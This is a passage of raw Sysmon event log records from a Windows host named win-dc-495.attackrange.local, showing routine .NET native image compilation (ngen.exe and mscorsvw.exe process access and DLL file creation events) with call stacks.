ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:34.017{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\108c-0\PresentationFramework-SystemDrawing.dll2021-01-18 13:46:34.017 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.704{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:35.704{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.626{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3202-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.610{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3202-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.610{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3202-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+8
4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:35.548{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13e0-0\PresentationFramework.Classic.dll2021-01-18 13:46:35.548 10341000x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.329{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.329{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:35.329{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3102-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.282{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-3002-00000000A301}2504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.267{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-3002-00000000A301}2504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.267{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-3002-00000000A301}2504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:35.204{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1390-0\PresentationFramework.AeroLite.dll2021-01-18 13:46:35.204 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.063{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.048{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:35.048{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913B-6005-2F02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2E02-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.985{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2E02-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.985{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2E02-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.704{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:36.704{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3602-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.548{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3602-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.548{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3602-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
